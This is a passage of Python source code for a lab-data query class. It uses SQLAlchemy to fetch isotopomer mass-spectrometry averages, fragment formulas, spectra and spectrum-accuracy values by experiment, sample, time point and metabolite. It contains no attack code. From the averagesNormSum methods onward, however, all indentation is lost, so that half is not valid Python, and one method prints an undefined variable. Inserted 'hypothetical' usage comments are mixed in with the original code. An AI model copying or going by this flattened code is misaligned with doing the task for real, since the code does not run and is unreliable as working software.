    def get_dataProductFragment_experimentIDAndTimePointSampleAbbreviationAndSampleTypeAndScanTypeAndMetID_dataStage01Averages(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I, met_id_I):
        '''Query peak data for a specific experiment_id, sample_name_abbreviation'''
        try:
            data = self.session.query(data_stage01_isotopomer_averages.fragment_formula,
                data_stage01_isotopomer_averages.fragment_mass,
                MS_components.product_fragment,
                data_stage01_isotopomer_averages.intensity_normalized_average,
                data_stage01_isotopomer_averages.intensity_normalized_cv,
                data_stage01_isotopomer_averages.intensity_theoretical,
                data_stage01_isotopomer_averages.abs_devFromTheoretical,
                data_stage01_isotopomer_spectrumAccuracy.spectrum_accuracy,
                data_stage01_isotopomer_averages.scan_type).filter(
                data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
                data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
                data_stage01_isotopomer_averages.time_point.like(time_point_I),
                data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
                data_stage01_isotopomer_averages.scan_type.like(scan_type_I),
                data_stage01_isotopomer_averages.met_id.like(met_id_I),
                data_stage01_isotopomer_averages.fragment_formula.like(MS_components.product_formula),
                data_stage01_isotopomer_averages.met_id.like(MS_components.met_id),
                MS_components.ms_methodtype.like('tuning'),
                data_stage01_isotopomer_averages.used_,
                data_stage01_isotopomer_spectrumAccuracy.sample_name_abbreviation.like(sample_name_abbreviation_I),
                data_stage01_isotopomer_spectrumAccuracy.experiment_id.like(experiment_id_I),
                data_stage01_isotopomer_spectrumAccuracy.time_point.like(time_point_I),
                data_stage01_isotopomer_spectrumAccuracy.sample_type.like(sample_type_I),
                data_stage01_isotopomer_spectrumAccuracy.scan_type.like(scan_type_I),
                data_stage01_isotopomer_spectrumAccuracy.met_id.like(met_id_I),
                data_stage01_isotopomer_spectrumAccuracy.used_.is_(True),
                data_stage01_isotopomer_spectrumAccuracy.fragment_formula.like(MS_components.product_formula),
                data_stage01_isotopomer_spectrumAccuracy.met_id.like(MS_components.met_id)).group_by(
                data_stage01_isotopomer_averages.fragment_formula,
                data_stage01_isotopomer_averages.fragment_mass,
                MS_components.product_fragment,
                data_stage01_isotopomer_averages.intensity_normalized_average,
                data_stage01_isotopomer_averages.intensity_normalized_cv,
                data_stage01_isotopomer_averages.intensity_theoretical,
                data_stage01_isotopomer_averages.abs_devFromTheoretical,
                data_stage01_isotopomer_spectrumAccuracy.spectrum_accuracy,
                data_stage01_isotopomer_averages.scan_type).order_by(
                data_stage01_isotopomer_averages.fragment_formula.desc(),
                data_stage01_isotopomer_averages.fragment_mass.asc()).all();
            data_O = [];
            if not data:
                print('No normalized intensities found for the following:')
                print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
                return data_O;
            else:
                # the algorithm will break if there is no data for the a0 mass or if there are jumps in the a values (i.e. a0 to a2);
                fragment_formula = '';
                fragment_formula_old = '';
                data_cnt = len(data)-1;
                i = 0;
                while i <= data_cnt:
                    fragment_formula_old = data[i].fragment_formula;
                    row_key = [];
                    row_theoretical = [];
                    row_measured = [];
                    row_measured_cv = [];
                    row_measured_dif = [];
                    row_spectrum_accuracy = [];
                    row = [];
                    for a in range(50):
                        if i <= data_cnt:
                            fragment_formula = data[i].fragment_formula;
                            if fragment_formula == fragment_formula_old:
                                if a == 0:
                                    # add key columns
                                    row_key.append(sample_name_abbreviation_I);
                                    row_key.append(time_point_I);
                                    row_key.append(met_id_I);
                                    row_key.append(data[i].fragment_formula);
                                    row_key.append(str(data[i].product_fragment));
                                    row_key.append(data[i].scan_type);
                                    row_spectrum_accuracy.append(data[i].spectrum_accuracy);
                                    mass0 = data[i].fragment_mass
                                massi = data[i].fragment_mass;
                                massDif = massi-mass0;
                                # add a+0... information
                                if data[i].intensity_theoretical: theoretical = numpy.round(data[i].intensity_theoretical,3);
                                else: theoretical = data[i].intensity_theoretical;
                                row_theoretical.append(theoretical)
                                if data[i].intensity_normalized_average: measured = numpy.round(data[i].intensity_normalized_average,3);
                                else: measured = data[i].intensity_normalized_average;
                                row_measured.append(measured)
                                if data[i].intensity_normalized_cv: cv = numpy.round(data[i].intensity_normalized_cv,3);
                                else: cv = data[i].intensity_normalized_cv;
                                row_measured_cv.append(cv);
                                if data[i].abs_devFromTheoretical: dif = numpy.round(data[i].abs_devFromTheoretical,3)
                                else: dif = data[i].abs_devFromTheoretical;
                                row_measured_dif.append(dif)
                                i += 1;
                            else:
                                row_theoretical.append(None);
                                row_measured.append(None);
                                row_measured_cv.append(None);
                                row_measured_dif.append(None);
                        else:
                            row_theoretical.append(None);
                            row_measured.append(None);
                            row_measured_cv.append(None);
                            row_measured_dif.append(None);
                    row.extend(row_key);
                    row.extend(row_theoretical);
                    row.extend(row_measured);
                    row.extend(row_measured_cv);
                    row.extend(row_measured_dif);
                    row.extend(row_spectrum_accuracy);
                    data_O.append(row);
                return data_O;
        except SQLAlchemyError as e:
            print(e);
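
    # --- Editor's note (added): the wide row built above has the layout
    #     [6 key columns] + [50 theoretical] + [50 measured] + [50 measured CV]
    #     + [50 abs. deviation from theoretical] + [1 spectrum accuracy],
    # i.e. one slot per isotopomer a+0 .. a+49 for each fragment formula; slots
    # past the last observed mass are padded with None.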
    def get_dataPrecursorFragment_experimentIDAndTimePointSampleAbbreviationAndSampleTypeAndScanTypeAndMetID_dataStage01Averages(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I, met_id_I):
        '''Query peak data for a specific experiment_id, sample_name_abbreviation'''
        try:
            data = self.session.query(data_stage01_isotopomer_averages.fragment_formula,
                data_stage01_isotopomer_averages.fragment_mass,
                MS_components.precursor_fragment,
                data_stage01_isotopomer_averages.intensity_normalized_average,
                data_stage01_isotopomer_averages.intensity_normalized_cv,
                data_stage01_isotopomer_averages.intensity_theoretical,
                data_stage01_isotopomer_averages.abs_devFromTheoretical,
                data_stage01_isotopomer_spectrumAccuracy.spectrum_accuracy,
                data_stage01_isotopomer_averages.scan_type).filter(
                data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
                data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
                data_stage01_isotopomer_averages.time_point.like(time_point_I),
                data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
                data_stage01_isotopomer_averages.scan_type.like(scan_type_I),
                data_stage01_isotopomer_averages.met_id.like(met_id_I),
                data_stage01_isotopomer_averages.fragment_formula.like(MS_components.precursor_formula),
                data_stage01_isotopomer_averages.met_id.like(MS_components.met_id),
                MS_components.ms_methodtype.like('tuning'),
                data_stage01_isotopomer_averages.used_,
                data_stage01_isotopomer_spectrumAccuracy.sample_name_abbreviation.like(sample_name_abbreviation_I),
                data_stage01_isotopomer_spectrumAccuracy.experiment_id.like(experiment_id_I),
                data_stage01_isotopomer_spectrumAccuracy.time_point.like(time_point_I),
                data_stage01_isotopomer_spectrumAccuracy.sample_type.like(sample_type_I),
                data_stage01_isotopomer_spectrumAccuracy.scan_type.like(scan_type_I),
                data_stage01_isotopomer_spectrumAccuracy.met_id.like(met_id_I),
                data_stage01_isotopomer_spectrumAccuracy.used_.is_(True),
                data_stage01_isotopomer_spectrumAccuracy.fragment_formula.like(MS_components.precursor_formula),
                data_stage01_isotopomer_spectrumAccuracy.met_id.like(MS_components.met_id)).group_by(
                data_stage01_isotopomer_averages.fragment_formula,
                data_stage01_isotopomer_averages.fragment_mass,
                MS_components.precursor_fragment,
                data_stage01_isotopomer_averages.intensity_normalized_average,
                data_stage01_isotopomer_averages.intensity_normalized_cv,
                data_stage01_isotopomer_averages.intensity_theoretical,
                data_stage01_isotopomer_averages.abs_devFromTheoretical,
                data_stage01_isotopomer_spectrumAccuracy.spectrum_accuracy,
                data_stage01_isotopomer_averages.scan_type).order_by(
                data_stage01_isotopomer_averages.fragment_formula.desc(),
                data_stage01_isotopomer_averages.fragment_mass.asc()).all();
            data_O = [];
            if not data:
                print('No normalized intensities found for the following:')
                print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
                return data_O;
            else:
                # the algorithm will break if there is no data for the a0 mass or if there are jumps in the a values (i.e. a0 to a2);
                fragment_formula = '';
                fragment_formula_old = '';
                data_cnt = len(data)-1;
                i = 0;
                while i <= data_cnt:
                    fragment_formula_old = data[i].fragment_formula;
                    row_key = [];
                    row_theoretical = [];
                    row_measured = [];
                    row_measured_cv = [];
                    row_measured_dif = [];
                    row_spectrum_accuracy = [];
                    row = [];
                    for a in range(50):
                        if i <= data_cnt:
                            fragment_formula = data[i].fragment_formula;
                            if fragment_formula == fragment_formula_old:
                                if a == 0:
                                    # add key columns
                                    row_key.append(sample_name_abbreviation_I);
                                    row_key.append(time_point_I);
                                    row_key.append(met_id_I);
                                    row_key.append(data[i].fragment_formula);
                                    row_key.append(str(data[i].precursor_fragment));
                                    row_key.append(data[i].scan_type);
                                    row_spectrum_accuracy.append(data[i].spectrum_accuracy);
                                    mass0 = data[i].fragment_mass
                                massi = data[i].fragment_mass;
                                massDif = massi-mass0;
                                # add a+0... information
                                if data[i].intensity_theoretical: theoretical = numpy.round(data[i].intensity_theoretical,3);
                                else: theoretical = data[i].intensity_theoretical;
                                row_theoretical.append(theoretical)
                                if data[i].intensity_normalized_average: measured = numpy.round(data[i].intensity_normalized_average,3);
                                else: measured = data[i].intensity_normalized_average;
                                row_measured.append(measured)
                                if data[i].intensity_normalized_cv: cv = numpy.round(data[i].intensity_normalized_cv,3);
                                else: cv = data[i].intensity_normalized_cv;
                                row_measured_cv.append(cv);
                                if data[i].abs_devFromTheoretical: dif = numpy.round(data[i].abs_devFromTheoretical,3)
                                else: dif = data[i].abs_devFromTheoretical;
                                row_measured_dif.append(dif)
                                i += 1;
                            else:
                                row_theoretical.append(None);
                                row_measured.append(None);
                                row_measured_cv.append(None);
                                row_measured_dif.append(None);
                        else:
                            row_theoretical.append(None);
                            row_measured.append(None);
                            row_measured_cv.append(None);
                            row_measured_dif.append(None);
                    row.extend(row_key);
                    row.extend(row_theoretical);
                    row.extend(row_measured);
                    row.extend(row_measured_cv);
                    row.extend(row_measured_dif);
                    row.extend(row_spectrum_accuracy);
                    data_O.append(row);
                return data_O;
        except SQLAlchemyError as e:
            print(e);
    # query used and comment from data_stage01_isotopomer_averages
    def get_row_experimentID_dataStage01Averages(self,experiment_id_I):
        '''Query row information (used and comment) from data_stage01_isotopomer_averages'''
        try:
            data = self.session.query(data_stage01_isotopomer_averages.experiment_id,
                data_stage01_isotopomer_averages.sample_name_abbreviation,
                data_stage01_isotopomer_averages.sample_type,
                data_stage01_isotopomer_averages.time_point,
                data_stage01_isotopomer_averages.met_id,
                data_stage01_isotopomer_averages.fragment_formula,
                data_stage01_isotopomer_averages.fragment_mass,
                data_stage01_isotopomer_averages.scan_type,
                data_stage01_isotopomer_averages.used_,
                data_stage01_isotopomer_averages.comment_).filter(
                data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I)).all();
            data_O = [];
            if not data:
                print(('No row information found for experiment_id: ' + experiment_id_I));
                return data_O;
            else:
                for d in data:
                    data_tmp = {};
                    data_tmp['experiment_id']=d.experiment_id;
                    data_tmp['sample_name_abbreviation']=d.sample_name_abbreviation;
                    data_tmp['sample_type']=d.sample_type;
                    data_tmp['time_point']=d.time_point;
                    data_tmp['met_id']=d.met_id;
                    data_tmp['fragment_formula']=d.fragment_formula;
                    data_tmp['fragment_mass']=d.fragment_mass;
                    data_tmp['scan_type']=d.scan_type;
                    data_tmp['used_']=d.used_;
                    data_tmp['comment_']=d.comment_;
                    data_O.append(data_tmp);
                return data_O;
        except SQLAlchemyError as e:
            print(e);
## Query from data_stage01_isotopomer_averagesNormSum:
# query time points from data_stage01_isotopomer_averagesNormSum:
def get_timePoint_experimentID_dataStage01AveragesNormSum(self,experiment_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_isotopomer_averagesNormSum.time_point).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.time_point).order_by(
data_stage01_isotopomer_averagesNormSum.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentIDAndSampleNameAbbreviation_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I):
'''Querry time points that are used from the experiment and sample name abbreviation'''
try:
time_points = self.session.query(data_stage01_isotopomer_averagesNormSum.time_point).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.time_point).order_by(
data_stage01_isotopomer_averagesNormSum.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# query sample name abbreviations from data_stage01_isotopomer_averagesNormSum:
def get_sampleNameAbbreviations_experimentIDAndSampleType_dataStage01AveragesNormSum(self,experiment_id_I,sample_type_I):
'''Query the used sample name abbreviations for the experiment and sample type'''
try:
sample_name_abbreviations = self.session.query(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I)).group_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).order_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).all();
sample_name_abbreviations_O = [];
for sn in sample_name_abbreviations:
sample_name_abbreviations_O.append(sn[0]);
return sample_name_abbreviations_O;
except SQLAlchemyError as e:
print(e);
def get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01AveragesNormSum(self,experiment_id_I,sample_type_I,time_point_I):
'''Query the used sample name abbreviations for the experiment, sample type, and time point'''
try:
sample_name_abbreviations = self.session.query(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I)).group_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).order_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation).all();
sample_name_abbreviations_O = [];
for sn in sample_name_abbreviations:
sample_name_abbreviations_O.append(sn[0]);
return sample_name_abbreviations_O;
except SQLAlchemyError as e:
print(e);
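# Example usage (hypothetical sketch; all argument values are assumptions):
#   snas = iq.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01AveragesNormSum(
#       'ALEOx_01','analytical','0');
#   # -> distinct sample name abbreviations for that sample type and time point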
# query scan types from data_stage01_isotopomer_averagesNormSum
def get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(self,experiment_id_I,time_point_I,sample_name_abbreviations_I,sample_type_I):
'''Query the used scan types for the experiment, time point, sample name abbreviation, and sample type'''
try:
scan_types = self.session.query(
data_stage01_isotopomer_averagesNormSum.scan_type).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviations_I)).group_by(
data_stage01_isotopomer_averagesNormSum.scan_type).order_by(
data_stage01_isotopomer_averagesNormSum.scan_type).all();
scan_types_O = [];
for st in scan_types:
scan_types_O.append(st[0]);
return scan_types_O;
except SQLAlchemyError as e:
print(e);
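# Example usage (hypothetical sketch; argument values are assumptions):
#   scan_types = iq.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(
#       'ALEOx_01','0','OxicWT','analytical');
#   # -> e.g. ['EPI']: distinct scan types for the matching used_ rows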
# query met_ids from data_stage01_isotopomer_averagesNormSum
def get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I):
'''Query the used met ids for the experiment, sample abbreviation, time point, sample type, and scan type'''
try:
met_ids = self.session.query(data_stage01_isotopomer_averagesNormSum.met_id).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.met_id).order_by(
data_stage01_isotopomer_averagesNormSum.met_id.asc()).all();
met_ids_O = [];
if not(met_ids):
print("no results found")
print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I");
print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I);
else:
for cn in met_ids:
met_ids_O.append(cn[0]);
return met_ids_O;
except SQLAlchemyError as e:
print(e);
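# Example usage (hypothetical sketch; argument values are assumptions):
#   met_ids = iq.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01AveragesNormSum(
#       'ALEOx_01','OxicWT','0','analytical','EPI');
#   # -> e.g. ['fdp', 'pep']: distinct met ids, sorted ascending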
# query fragment formulas from data_stage01_isotopomer_averagesNormSum
def get_fragmentFormula_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I,met_id_I):
'''Query the used fragment formulas for the experiment, sample abbreviation, time point, sample type, scan type, and met id'''
try:
fragments = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_formula).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula).order_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula.asc()).all();
fragments_O = [];
if not(fragments):
print("no results found")
print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I met_id_I");
print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I,met_id_I);
else:
for cn in fragments:
fragments_O.append(cn[0]);
return fragments_O;
except SQLAlchemyError as e:
print(e);
# query spectrum from data_stage01_isotopomer_averagesNormSum
def get_spectrum_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetIDAndFragmentFormula_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I,met_id_I,fragment_formula_I):
'''Query the spectrum (fragment masses with normalized intensity averages and CVs) for the experiment, sample abbreviation, time point, sample type, scan type, met id, and fragment formula'''
try:
fragments = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_mass,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(fragment_formula_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_mass,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv).order_by(
data_stage01_isotopomer_averagesNormSum.fragment_mass.asc()).all();
fragment_mass_O = [];
intensity_normalized_average_O = [];
intensity_normalized_cv_O = [];
if not(fragments):
print("no results found")
print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I met_id_I fragment_forula_I");
print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I,met_id_I,fragment_forula_I);
else:
for cn in fragments:
fragment_mass_O.append(cn[0]);
intensity_normalized_average_O.append(cn[1]);
intensity_normalized_cv_O.append(cn[2]);
return intensity_normalized_average_O,intensity_normalized_cv_O,fragment_mass_O;
except SQLAlchemyError as e:
print(e);
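# Example usage (hypothetical sketch; argument values are assumptions). Note the
# return order: normalized-intensity averages first, then CVs, then fragment masses:
#   aves,cvs,masses = iq.get_spectrum_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetIDAndFragmentFormula_dataStage01AveragesNormSum(
#       'ALEOx_01','OxicWT','0','analytical','EPI','fdp','C6H13O12P2');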
# query normalized intensity from data_stage01_isotopomer_averagesNormSum
def get_dataProductFragment_experimentIDAndTimePointSampleAbbreviationAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I, met_id_I):
'''Query normalized product-fragment peak data for a specific experiment_id, sample_name_abbreviation, time_point, sample_type, scan_type, and met_id'''
try:
data = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
MS_components.product_fragment,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracyNormSum.spectrum_accuracy,
data_stage01_isotopomer_averagesNormSum.scan_type).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(MS_components.product_formula),
data_stage01_isotopomer_averagesNormSum.met_id.like(MS_components.met_id),
MS_components.ms_methodtype.like('tuning'),
data_stage01_isotopomer_averagesNormSum.used_.is_(True),
data_stage01_isotopomer_spectrumAccuracyNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.used_.is_(True),
data_stage01_isotopomer_spectrumAccuracyNormSum.fragment_formula.like(MS_components.product_formula),
data_stage01_isotopomer_spectrumAccuracyNormSum.met_id.like(MS_components.met_id)).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
MS_components.product_fragment,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracyNormSum.spectrum_accuracy,
data_stage01_isotopomer_averagesNormSum.scan_type).order_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula.desc(),
data_stage01_isotopomer_averagesNormSum.fragment_mass.asc()).all();
data_O = [];
if not data:
print('No normalized intensities found for the following:')
print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
return data_O;
else:
# NOTE: this algorithm will break if there is no data for the a0 mass or if there are jumps in the a values (i.e., a0 to a2);
fragment_formula = '';
fragment_formula_old = '';
data_cnt = len(data)-1;
i = 0;
while i <= data_cnt:
fragment_formula_old = data[i].fragment_formula;
row_key = [];
row_theoretical = [];
row_measured = [];
row_measured_cv = [];
row_measured_dif = [];
row_spectrum_accuracy = [];
row = [];
for a in range(50):
if i <= data_cnt:
fragment_formula = data[i].fragment_formula;
if fragment_formula == fragment_formula_old:
if a == 0:
# add key columns
row_key.append(sample_name_abbreviation_I);
row_key.append(time_point_I);
row_key.append(met_id_I);
row_key.append(data[i].fragment_formula);
row_key.append(str(data[i].product_fragment));
row_key.append(data[i].scan_type);
row_spectrum_accuracy.append(data[i].spectrum_accuracy);
mass0 = data[i].fragment_mass;  # reference (a0) mass
massi = data[i].fragment_mass;
massDif = massi-mass0;  # mass difference from a0 (not used further below)
# add a+0... information
if data[i].intensity_theoretical: theoretical = numpy.round(data[i].intensity_theoretical,3);
else: theoretical = data[i].intensity_theoretical;
row_theoretical.append(theoretical)
if data[i].intensity_normalized_average: measured = numpy.round(data[i].intensity_normalized_average,3);
else: measured = data[i].intensity_normalized_average;
row_measured.append(measured)
if data[i].intensity_normalized_cv: cv = numpy.round(data[i].intensity_normalized_cv,3);
else: cv = data[i].intensity_normalized_cv;
row_measured_cv.append(cv);
if data[i].abs_devFromTheoretical: dif = numpy.round(data[i].abs_devFromTheoretical,3)
else: dif = data[i].abs_devFromTheoretical;
row_measured_dif.append(dif)
i += 1;
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
row.extend(row_key);
row.extend(row_theoretical);
row.extend(row_measured);
row.extend(row_measured_cv);
row.extend(row_measured_dif);
row.extend(row_spectrum_accuracy);
data_O.append(row);
return data_O;
except SQLAlchemyError as e:
print(e);
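# Example usage (hypothetical sketch; argument values are assumptions). As written,
# each returned row is a flat list of 6 key columns, four blocks of 50 values each
# (theoretical, measured, CV, abs. deviation; padded with None), and 1 spectrum accuracy:
#   rows = iq.get_dataProductFragment_experimentIDAndTimePointSampleAbbreviationAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(
#       'ALEOx_01','OxicWT','0','analytical','EPI','fdp');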
def get_dataPrecursorFragment_experimentIDAndTimePointSampleAbbreviationAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I, met_id_I):
'''Query normalized precursor-fragment peak data for a specific experiment_id, sample_name_abbreviation, time_point, sample_type, scan_type, and met_id'''
try:
data = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
MS_components.precursor_fragment,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracyNormSum.spectrum_accuracy,
data_stage01_isotopomer_averagesNormSum.scan_type).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(MS_components.precursor_formula),
data_stage01_isotopomer_averagesNormSum.met_id.like(MS_components.met_id),
MS_components.ms_methodtype.like('tuning'),
data_stage01_isotopomer_averagesNormSum.used_.is_(True),
data_stage01_isotopomer_spectrumAccuracyNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_spectrumAccuracyNormSum.used_.is_(True),
data_stage01_isotopomer_spectrumAccuracyNormSum.fragment_formula.like(MS_components.precursor_formula),
data_stage01_isotopomer_spectrumAccuracyNormSum.met_id.like(MS_components.met_id)).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula,
